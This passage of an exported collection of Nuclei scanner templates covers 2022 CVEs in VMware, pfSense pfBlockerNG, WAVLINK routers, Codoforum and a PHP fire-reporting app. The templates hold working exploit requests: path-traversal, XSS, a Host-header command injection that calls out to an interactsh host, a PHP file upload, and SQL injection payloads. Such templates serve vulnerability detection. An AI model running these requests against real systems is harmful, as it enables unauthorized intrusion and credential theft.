{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - duration>=7\n - contains(header, \"text/html\")\n - status_code == 200\n - contains(body, '{\\\"CardNo\\\":false')\n condition: and\n# digest: 490a00463044022053c6c0b414614939f1d2b380003b62e3c5c2ad61ebb65e15a4655208c25c77ac022019921227f71829241115d45ac485c1a8d6378801ec680e5c9dc2b0ac2f7ebd44:922c64590222798bb761d5b6d8e72950", "hash": "cb722992000cfad9c9287ccd20c0c135", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308527" }, "name": "CVE-2022-31656.yaml", "content": "id: CVE-2022-31656\n\ninfo:\n name: VMware - Local File Inclusion\n author: DhiyaneshDk\n severity: critical\n description: |\n VMware Workspace ONE Access, Identity Manager, and Realize Automation are vulnerable to local file inclusion because they contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.\n impact: |\n The impact of this vulnerability is that an attacker can read sensitive files on the server, which may contain credentials, configuration files, or other sensitive information.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in file inclusion operations.\n reference:\n - https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd\n - https://www.vmware.com/security/advisories/VMSA-2022-0021.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31656\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31656\n cwe-id: CWE-287\n epss-score: 0.75034\n epss-percentile: 0.98069\n cpe: cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: vmware\n product: identity_manager\n shodan-query: http.favicon.hash:-1250474341\n tags: cve2022,cve,vmware,lfi\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"<web-app\"\n - \"<servlet-name>\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/xml\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fc99ab76b85fe7af4c15382225072a02b8545f4dcec877333d9a9111e35ecca0220299ac713abf18e223cc14b635004720ca4bf1bc1ce09b5add49a3dc3ab98cd3b:922c64590222798bb761d5b6d8e72950", "hash": "2d0a237e2fd94071484cc8b5502df85c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308528" }, "name": "CVE-2022-31798.yaml", "content": "id: CVE-2022-31798\n\ninfo:\n name: Nortek Linear eMerge E3-Series - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: |\n There is a local session fixation vulnerability that, when chained with cross-site scripting, leads to account take over of admin or a lower privileged user.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in the Nortek Linear eMerge E3-Series.\n reference:\n - https://packetstormsecurity.com/files/167992/\n - http://packetstormsecurity.com/files/167992/Nortek-Linear-eMerge-E3-Series-Account-Takeover.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31798\n - https://eg.linkedin.com/in/omar-1-hashem\n - https://gist.github.com/omarhashem123/bccdcec70ab7e8f00519d56ea2e3fd79\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-31798\n cwe-id: CWE-384\n epss-score: 0.00126\n epss-percentile: 0.46259\n cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nortekcontrol\n product: emerge_e3_firmware\n shodan-query: http.title:\"eMerge\"\n tags: cve2022,cve,emerge,nortek,xss,packetstorm,nortekcontrol\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ',\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202b941581c6f68df980a8270b98dd682d5d4d930e77ed81d8c35c21b892d9a6dd02203a358f1b032aaf21786d73f91dd64abf62f5a234c1350ac6645838da8a471757:922c64590222798bb761d5b6d8e72950", "hash": "ac8a4edae89c7f800f25a939845ad62b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308529" }, "name": "CVE-2022-31814.yaml", "content": "id: CVE-2022-31814\n\ninfo:\n name: pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection\n author: EvergreenCartoons\n severity: critical\n description: |\n pfSense pfBlockerNG through 2.1.4_26 is susceptible to OS command injection via root via shell metacharacters in the HTTP Host header. NOTE: 3.x is unaffected.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.\n remediation: |\n Upgrade to a patched version of pfSense pfBlockerNG (>=2.1..4_27) to mitigate this vulnerability.\n reference:\n - https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/\n - https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html\n - https://github.com/EvergreenCartoons/SenselessViolence\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31814\n - http://packetstormsecurity.com/files/171123/pfBlockerNG-2.1.4_26-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31814\n cwe-id: CWE-78\n epss-score: 0.96552\n epss-percentile: 0.9952\n cpe: cpe:2.3:a:netgate:pfblockerng:*:*:*:*:*:pfsense:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: netgate\n product: pfblockerng\n framework: pfsense\n tags: cve,cve2022,packetstorm,pfsense,pfblockerng,rce,oast,netgate\n\nhttp:\n - raw:\n - |+\n GET /pfblockerng/www/index.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n - |+\n GET /pfblockerng/www/index.php HTTP/1.1\n Host: ' *; host {{interactsh-url}}; '\n Accept: */*\n\n unsafe: true\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - 'contains(body_1, \"GIF\")'\n\n - type: word\n part: interactsh_protocol # Confirms the DNS Interaction\n words:\n - \"dns\"\n# digest: 4a0a00473045022100ba04d468e5a36b316af5cde0bdfdce8d0e404952c265bdef97fb533f492ecc530220344972954e1c9bedcfeea63f373297c16cf7a9cf1c8cd580f99a97a6662fbae8:922c64590222798bb761d5b6d8e72950", "hash": "b4b14d2dab7a4e1139c758d07e11fdcf", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852a" }, "name": "CVE-2022-31845.yaml", "content": "id: CVE-2022-31845\n\ninfo:\n name: WAVLINK WN535 G3 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in live_check.shtml. An attacker can obtain sensitive router information via execution of the exec cmd function and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as login credentials or network configuration.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__check_live.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31845\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31845\n cwe-id: CWE-668\n epss-score: 0.00874\n epss-percentile: 0.80606\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n GET /live_check.shtml HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Model='\n - 'FW_Version='\n - 'LanIP='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220320f5afe5b1b728587b2540cc0f8d5f61452ff54c986c8f7eadc1856f0a905ec022100d8f3ff9a7705d462d45e1199ba0ee430e88585bafcfc874820c5f88ddc76dbcb:922c64590222798bb761d5b6d8e72950", "hash": "6986b876bbbc584aa997baebac923755", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852b" }, "name": "CVE-2022-31846.yaml", "content": "id: CVE-2022-31846\n\ninfo:\n name: WAVLINK WN535 G3 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN535 G3 M35G3R.V5030.180927 is susceptible to information disclosure in the live_mfg.shtml page. An attacker can obtain sensitive router information via the exec cmd function and possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, such as router configuration settings and user credentials.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN535%20G3__live_mfg.md\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30489\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31846\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31846\n cwe-id: CWE-668\n epss-score: 0.00874\n epss-percentile: 0.80651\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:m35g3r.v5030.180927:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/live_mfg.shtml\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Model='\n - 'DefaultIP='\n - 'LOGO1='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b9cd4b97ec4bf8df3c4a6c42dd322e42e6b9775243e3e0d725974ef0a3ba64c0022100f77e80b869527ee2c9ea6cae10ddb889a57d738ce645695ce451f64db8a8eae5:922c64590222798bb761d5b6d8e72950", "hash": "9e3f7c713f29c6c6e6ce1193310cda41", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852c" }, "name": "CVE-2022-31847.yaml", "content": "id: CVE-2022-31847\n\ninfo:\n name: WAVLINK WN579 X3 M79X3.V5030.180719 - Information Disclosure\n author: arafatansari\n severity: high\n description: |\n WAVLINK WN579 X3 M79X3.V5030.180719 is susceptible to information disclosure in /cgi-bin/ExportAllSettings.sh. An attacker can obtain sensitive router information via a crafted POST request and thereby possibly obtain additional sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, such as router configuration settings and user credentials.\n remediation: |\n Apply the latest firmware update provided by the vendor to fix the information disclosure vulnerability.\n reference:\n - https://github.com/pghuanghui/CVE_Request/blob/main/WAVLINK%20WN579%20X3__Sensitive%20information%20leakage.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31847\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-31847\n cwe-id: CWE-425\n epss-score: 0.01285\n epss-percentile: 0.84308\n cpe: cpe:2.3:o:wavlink:wn579x3_firmware:m79x3.v5030.180719:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn579x3_firmware\n shodan-query: http.html:\"Wavlink\"\n tags: cve,cve2022,wavlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cgi-bin/ExportAllSettings.sh\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'Login='\n - 'Password='\n - 'Model='\n - 'AuthMode='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502202db1124164825b434395a0b2ed0eaadb8991a9b259a4aca81bd4c657793b8da0022100d3a817be0f73d3bf46078f8483bf8c513a3047485830b59564d7d136ce67632e:922c64590222798bb761d5b6d8e72950", "hash": "8b8529863425c0e9e497cd2e0d842053", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852d" }, "name": "CVE-2022-31854.yaml", "content": "id: CVE-2022-31854\n\ninfo:\n name: Codoforum 5.1 - Arbitrary File Upload\n author: theamanrawat\n severity: high\n description: |\n Codoforum 5.1 contains an arbitrary file upload vulnerability via the logo change option in the admin panel. An attacker can upload arbitrary files to the server, which in turn can be used to make the application execute file content as code. As a result, an attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized remote code execution on the affected system.\n remediation: |\n Apply the latest security patch or upgrade to a patched version of Codoforum.\n reference:\n - https://bitbucket.org/evnix/codoforum_downloads/downloads/codoforum.v.5.1.zip\n - https://codoforum.com\n - https://vikaran101.medium.com/codoforum-v5-1-authenticated-rce-my-first-cve-f49e19b8bc\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31854\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31854\n cwe-id: CWE-434\n epss-score: 0.17108\n epss-percentile: 0.95958\n cpe: cpe:2.3:a:codologic:codoforum:5.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: codologic\n product: codoforum\n tags: cve,cve2022,rce,codoforumrce,authenticated,intrusive,codologic\n\nhttp:\n - raw:\n - |\n POST /admin/?page=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryACGPpj7UIqmtLNbB\n\n ------WebKitFormBoundaryACGPpj7UIqmtLNbB\n Content-Disposition: form-data; name=\"username\"\n\n {{username}}\n ------WebKitFormBoundaryACGPpj7UIqmtLNbB\n Content-Disposition: form-data; name=\"password\"\n\n {{password}}\n ------WebKitFormBoundaryACGPpj7UIqmtLNbB--\n - |\n GET /admin/index.php?page=config HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/index.php?page=config HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoLtdjuqj2ixPvBhA\n\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA\n Content-Disposition: form-data; name=\"site_title\"\n\n\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA\n Content-Disposition: form-data; name=\"forum_logo\"; filename=\"{{randstr}}.php\"\n Content-Type: application/x-httpd-php\n\n <?php\n\n echo md5('CVE-2022-31854');\n\n ?>\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA\n Content-Disposition: form-data; name=\"CSRF_token\"\n\n {{csrf}}\n ------WebKitFormBoundaryoLtdjuqj2ixPvBhA--\n - |\n GET /sites/default/assets/img/attachments/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_4 == 200\n - contains(content_type_4, \"text/html\")\n - contains(body_4, \"a63fd49130de6406a66600cd8caa162f\")\n condition: and\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - name=\"CSRF_token\" value=\"([0-9a-zA-Z]+)\"/>\n internal: true\n# digest: 490a0046304402200fc44f8569c5b730415b2491b31a8709cd4a5c096a8e8dd650d1d58108709768022004858ff3b8255a696b01d2443eaf22d347e26d244a63611c77aee1c00133b538:922c64590222798bb761d5b6d8e72950", "hash": "7a0071f21c8eeb19042a8689bf55aa08", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852e" }, "name": "CVE-2022-31879.yaml", "content": "id: CVE-2022-31879\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat,j4vaovo\n severity: high\n description: |\n Online Fire Reporting System 1.0 is vulnerable to SQL Injection via the date parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Online-Fire-Reporting\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31879\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-31879\n cwe-id: CWE-89\n epss-score: 0.05519\n epss-percentile: 0.9247\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(0)))dPPt)+AND+'rogN'='rogN HTTP/1.1\n Host: {{Hostname}}\n - |\n @timeout: 15s\n GET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(10)))dPPt)+AND+'rogN'='rogN HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 200 && status_code_2 == 200'\n - 'duration_2 - duration_1 >= 7'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"Dashboard\")'\n condition: and\n# digest: 490a0046304402200b95b388c981218ff2010a5af1002d6e6eccdcf8edf8a660ea9c6ce4483c07d20220773161e78dd1caf3ee58849de5a6107b7470729bdf71f8122d9bd4e60641cbe0:922c64590222798bb761d5b6d8e72950", "hash": "f4d11a37c12d84ebb8f837754dda15fe", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30852f" }, "name": "CVE-2022-31974.yaml", "content": "id: CVE-2022-31974\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=reports&date=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-1.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31974\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31974\n cwe-id: CWE-89\n epss-score: 0.01429\n epss-percentile: 0.85199\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\nvariables:\n num: '999999999'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100cd024201d59f3b88ebf784aa61907ba5542a05e208b9e3de8c8bc7b30656f3c3022100f7aed5dfec5f88ed4297bc1f99e947e0c801b63bbf53a7dc7c1e655edb49ebac:922c64590222798bb761d5b6d8e72950", "hash": "13f3dc7136d354e348b70e75277a8674", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308530" }, "name": "CVE-2022-31975.yaml", "content": "id: CVE-2022-31975\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: high\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=user/manage_user&id=.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-2.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31975\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2022-31975\n cwe-id: CWE-89\n epss-score: 0.00834\n epss-percentile: 0.80157\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\nvariables:\n num: '999999999'\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5('{{num}}'),3,4,5,6,7,8,9,10,11--+\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"{{md5(num)}}\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a004830460221009910d6652352aff0eaac88c2b579c400a86a5f3ec6e122e5ac431a9d2f6079e2022100f750cb7ea36162240a1e8aef0aaebdc5a12c7e58e593b3b3ad12e780a227b3bc:922c64590222798bb761d5b6d8e72950", "hash": "569bb0a15862c5664df0ec97b6109698", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308531" }, "name": "CVE-2022-31976.yaml", "content": "id: CVE-2022-31976\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_request.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-4.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31976\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31976\n cwe-id: CWE-89\n epss-score: 0.02036\n epss-percentile: 0.87769\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /classes/Master.php?f=delete_request HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\\\"}\")'\n condition: and\n# digest: 490a0046304402201c4e60b074ac073a47975a8d5098836fb4c229bc87513c05560b4e47c9b4a51d02201ce26a4554f2a66d0e4c8b00935d1587d66475498c0f538584c8099e981a9a46:922c64590222798bb761d5b6d8e72950", "hash": "142b185a6f130c7d578f5e23649386cf", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308532" }, "name": "CVE-2022-31977.yaml", "content": "id: CVE-2022-31977\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_team.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-3.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31977\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31977\n cwe-id: CWE-89\n epss-score: 0.01192\n epss-percentile: 0.83594\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /classes/Master.php?f=delete_team HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\\\"}\")'\n condition: and\n# digest: 4a0a00473045022100a3ea459a9ffb2cfecef3b00300e5e65a75669bec415a481218447c92d129345402203e0b8a16ac80e4fb7948d2c418a4745685d3d2b8b3e29760b858effcf3b864e6:922c64590222798bb761d5b6d8e72950", "hash": "03f38d556b5afb9a3d82dc00d652f7de", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308533" }, "name": "CVE-2022-31978.yaml", "content": "id: CVE-2022-31978\n\ninfo:\n name: Online Fire Reporting System v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/classes/Master.php?f=delete_inquiry.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n To remediate this issue, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-5.md\n - https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-31978\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-31978\n cwe-id: CWE-89\n epss-score: 0.02031\n epss-percentile: 0.88685\n cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: online_fire_reporting_system_project\n product: online_fire_reporting_system\n tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /classes/Master.php?f=delete_inquiry HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n id='+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\")'\n condition: and\n# digest: 